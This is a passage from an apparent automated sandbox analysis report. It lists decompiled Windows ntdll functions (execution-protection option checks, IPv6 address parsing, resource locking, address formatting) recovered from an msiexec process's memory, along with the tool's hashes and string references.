						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02728375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02763F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0278E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02763F92();
					_t38 = 1;
					L2:
					return E0271E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02747f08
0x02747f0f
0x02747f12
0x02747f1b
0x02747f31
0x02763ead
0x02763eb4
0x00000000
0x00000000
0x02763eba
0x02763ecd
0x02763ed2
0x02763ee1
0x02763ee7
0x02763eec
0x02763f12
0x02763f18
0x02763f1a
0x00000000
0x00000000
0x02763f20
0x02763f26
0x02763f28
0x00000000
0x00000000
0x02763f2e
0x02763f30
0x00000000
0x00000000
0x02763f3a
0x02763f3b
0x02763f53
0x02763f64
0x02763f69
0x02763f6c
0x02763f6d
0x02763f6f
0x0276e304
0x0276e30f
0x0276e315
0x0276e31e
0x0276e321
0x0276e327
0x0276e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0276e32f
0x0276e32f
0x0276e337
0x0276e33a
0x0276e33b
0x0276e33d
0x0276e33f
0x0276e341
0x0276e341
0x0276e34e
0x0276e353
0x0276e358
0x0276e35d
0x0276e35f
0x00000000
0x00000000
0x0276e365
0x0276e365
0x0276e368
0x0276e36e
0x00000000
0x00000000
0x0276e374
0x0276e32f
0x02763f75
0x02763f7a
0x02763f7c
0x02763f7e
0x02763f86
0x02747f39
0x02747f47
0x02747f47
0x02747f37
0x02747f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02763F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0276E2FB
ExecuteOptions, xrefs: 02763F04
Execute=1, xrefs: 02763F5E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02763EC4
CLIENT(ntdll): Processing section info %ws..., xrefs: 0276E345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02763F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02763F4A

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 15189e88058c32266001e43af66f6bb1cfbef6775b96d14ad9923ea565dd66bd
Instruction ID: 4864f64db7a9299605e4ea41911b14c67d51776e3ad239a1b9386052080d74d9
Opcode Fuzzy Hash: 15189e88058c32266001e43af66f6bb1cfbef6775b96d14ad9923ea565dd66bd
Instruction Fuzzy Hash: 3341DA7168061C7FEB219A94DCCDFEBB3BDAF15704F0005A9EA05E6081EB709A45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02750B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02750B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02728980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0271DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02750CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02750CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E027506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E027506BA(_t135, _t178) == 0 || E02750A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02750CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02750CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E027506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E027506BA(_t124, _t142) == 0 || E02750A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02750b21
0x02750b24
0x02750b27
0x02750b2a
0x02750b2d
0x02750b30
0x02750b33
0x02750b36
0x02750b39
0x02750b3e
0x02750c65
0x02750c68
0x02750c6a
0x02750c6f
0x0277eb42
0x00000000
0x00000000
0x0277eb48
0x0277eb48
0x02750c75
0x02750c7a
0x0277eb54
0x00000000
0x00000000
0x00000000
0x0277eb5a
0x02750c80
0x02750c84
0x0277eb98
0x00000000
0x00000000
0x0277eba6
0x02750cb8
0x02750cba
0x02750cd3
0x02750cda
0x02750ce4
0x02750ce9
0x00000000
0x02750cec
0x02750c8c
0x0277eb63
0x00000000
0x00000000
0x0277eb70
0x0277eb75
0x0277eb7d
0x00000000
0x00000000
0x0277eb8c
0x00000000
0x0277eb8c
0x02750c96
0x00000000
0x00000000
0x02750ca2
0x02750cac
0x02750cb4
0x00000000
0x00000000
0x02750b44
0x02750b47
0x02750b49
0x00000000
0x00000000
0x02750b4f
0x02750b50
0x00000000
0x00000000
0x02750b56
0x02750b62
0x02750b7c
0x02750bac
0x02750a0f
0x0277eaaa
0x00000000
0x0277eac4
0x0277eac4
0x02750bd0
0x02750bd0
0x02750bd4
0x02750bd9
0x00000000
0x00000000
0x02750bdb
0x02750be0
0x0277eb0e
0x02750a1a
0x00000000
0x02750a1a
0x0277eb1a
0x0277eb1f
0x0277eb27
0x00000000
0x00000000
0x0277eb36
0x00000000
0x0277eb36
0x02750bea
0x00000000
0x00000000
0x02750bf6
0x02750c00
0x02750c03
0x02750c0b
0x00000000
0x02750c0b
0x0277eaaa
0x00000000
0x02750a15
0x02750bb6
0x00000000
0x02750bc6
0x02750bc6
0x02750bcb
0x02750c15
0x00000000
0x00000000
0x02750c1d
0x02750c20
0x02750c21
0x02750c24
0x02750c24
0x02750c26
0x00000000
0x02750c26
0x02750bcd
0x00000000
0x02750bcd
0x02750b89
0x02750b89
0x02750b90
0x00000000
0x00000000
0x02750b96
0x00000000
0x02750b96
0x02750a04
0x02750a04
0x02750b9a
0x02750b9a
0x02750b9b
0x02750b9f
0x00000000
0x00000000
0x00000000
0x02750ba5
0x02750ac7
0x02750aca
0x0277eacf
0x00000000
0x0277eade
0x0277eade
0x0277eae3
0x00000000
0x00000000
0x0277eaf3
0x0277eaf6
0x0277eaf7
0x0277eafe
0x0277eb01
0x00000000
0x0277eb01
0x0277eacf
0x02750ad0
0x02750ad4
0x00000000
0x00000000
0x02750ada
0x02750ae6
0x02750c34
0x00000000
0x02750c47
0x02750c49
0x02750c4a
0x02750c4e
0x02750c51
0x02750c54
0x02750c57
0x02750c5a
0x00000000
0x00000000
0x00000000
0x02750c60
0x02750afb
0x02750afe
0x02750b02
0x02750b05
0x02750b08
0x00000000
0x02750b08
0x02750ae6
0x02750b44
0x027509f8
0x027509f8
0x027509f9
0x00000000
0x00000000
0x0277eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02750BF6
__fassign.LIBCMT ref: 02750CA2

Strings

:, xrefs: 02750BA9
., xrefs: 02750A0C
:, xrefs: 02750AC7

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: f38a135da8b40d06a55cdb277ff8273d628f76c481b3a522f05be0642ac69e1a
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: D6A18C7590126ADFCF25CF68C8446FEF7B5AF0A308F24846ADC42B7240E7B09A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02750554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E02750554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0270F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02754FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02763F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02763F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0279217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02763F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02753915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0270F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02754FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02763F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02763F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0279217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02763F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02753915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02735384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0270F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02753915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0270F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02753915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0270F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02753915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02735329(_t110, _t138);
																return E027353A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0275055a
0x0275055d
0x02750563
0x02750566
0x027505d8
0x027505e2
0x027505e5
0x00000000
0x027505e7
0x027505e7
0x027505ea
0x027505f3
0x027505f3
0x02750568
0x02750568
0x02750568
0x02750569
0x02750569
0x02750569
0x0275056b
0x00000000
0x00000000
0x0277217f
0x02772183
0x0277225b
0x0277225f
0x02772189
0x0277218c
0x0277218f
0x02772194
0x02772199
0x0277219d
0x027721a0
0x027721a2
0x027721ce
0x027721ce
0x027721ce
0x027721d0
0x027721d6
0x027721de
0x027721e2
0x027721e8
0x027721e9
0x027721ec
0x027721f1
0x027721f6
0x00000000
0x00000000
0x027721f8
0x027721fb
0x02772206
0x0277220b
0x0277220c
0x02772217
0x02772226
0x0277222b
0x0277222c
0x0277222f
0x02772232
0x02772235
0x02772235
0x0277223a
0x0277223f
0x02772241
0x02772243
0x02772248
0x02772248
0x0277224d
0x0277224f
0x02772262
0x02772263
0x02772268
0x02772269
0x02772269
0x02772269
0x0277226d
0x00000000
0x00000000
0x02772276
0x02772279
0x0277227e
0x02772283
0x02772287
0x0277228a
0x0277228d
0x0277228f
0x027722bc
0x027722bc
0x027722bc
0x027722be
0x027722c4
0x027722cc
0x027722d0
0x027722d6
0x027722d7
0x027722da
0x027722df
0x027722e4
0x00000000
0x00000000
0x027722e6
0x027722e9
0x027722f4
0x027722f9
0x027722fa
0x02772305
0x02772314
0x02772319
0x0277231a
0x0277231d
0x02772320
0x02772323
0x02772323
0x02772328
0x0277232d
0x0277232f
0x02772331
0x02772336
0x02772336
0x0277233b
0x0277233d
0x02772350
0x02772351
0x02772356
0x02772359
0x02772359
0x0277235b
0x0277235d
0x02735367
0x0273536b
0x02735372
0x00000000
0x00000000
0x00000000
0x00000000
0x02772363
0x02772363
0x02772369
0x0277236a
0x0277236c
0x02772371
0x02772373
0x00000000
0x02772379
0x02772379
0x0277237a
0x0277237f
0x0277237f
0x02772385
0x02772386
0x02772389
0x0277238e
0x02772390
0x02735378
0x0273537c
0x02772396
0x02772396
0x02772397
0x0277239c
0x027723a2
0x027723a3
0x027723a6
0x027723ab
0x027723ad
0x00000000
0x027723b3
0x027723b3
0x027723b4
0x027723b9
0x027723ba
0x027723ba
0x027723bc
0x027723bf
0x00000000
0x00000000
0x02769153
0x02769158
0x0276915a
0x0276915e
0x02769160
0x00000000
0x02769166
0x02769166
0x02769171
0x02769176
0x02769176
0x00000000
0x02769160
0x027723c6
0x027723d7
0x027723d7
0x027723ad
0x02772390
0x02772373
0x0277233f
0x0277233f
0x00000000
0x0277233f
0x02772291
0x02772291
0x02772293
0x02772295
0x0277229a
0x027722a1
0x027722a3
0x027722a7
0x027722a9
0x00000000
0x00000000
0x027722ab
0x027722ad
0x027722af
0x00000000
0x00000000
0x00000000
0x027722af
0x027722b1
0x027722b4
0x027722b4
0x027722b6
0x027353be
0x027353be
0x027353be
0x027353c0
0x00000000
0x00000000
0x027353cb
0x027353ce
0x027353d0
0x027353d4
0x027353d6
0x00000000
0x027353d8
0x027353e3
0x027353ea
0x027353ea
0x00000000
0x027353d6
0x00000000
0x00000000
0x00000000
0x00000000
0x027722b6
0x00000000
0x0277228f
0x02772349
0x0277234d
0x02772251
0x02772251
0x00000000
0x02772251
0x027721a4
0x027721a4
0x027721a6
0x027721a8
0x027721ac
0x027721b6
0x027721b8
0x027721bc
0x027721be
0x00000000
0x00000000
0x027721c0
0x027721c2
0x027721c4
0x00000000
0x00000000
0x00000000
0x027721c4
0x027721c6
0x027721c6
0x027721c8
0x00000000
0x00000000
0x00000000
0x00000000
0x027721c8
0x027721a2
0x00000000
0x02772183
0x0275057b
0x0275057d
0x02750581
0x02750583
0x02772178
0x00000000
0x02750589
0x0275058f
0x0275058f
0x02750583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02772206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 027722FC
RTL: Resource at %p, xrefs: 0277221D, 0277230B
RTL: Re-Waiting, xrefs: 0277223A, 02772328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0277220E

Memory Dump Source

Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true

Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: e50e0509df26cc16229efab5d55ba238bd796c55c7ddbf9304d5a148ed016555
Instruction ID: aba9e01e91f1da06a97a9c365a74bf1c82bf1d3c77b0053852ffe63a56a9b152
Opcode Fuzzy Hash: e50e0509df26cc16229efab5d55ba238bd796c55c7ddbf9304d5a148ed016555
Instruction Fuzzy Hash: 1A515B717002116FEF15CE18CC85FA673AAAF99710F218259ED65EB3C6DA71EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 027514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E027514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x27f2088; // 0x766d5afb
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02747707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E027513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02747707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02747707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02712340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0271E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x027514c0
0x027514cb
0x027514d2
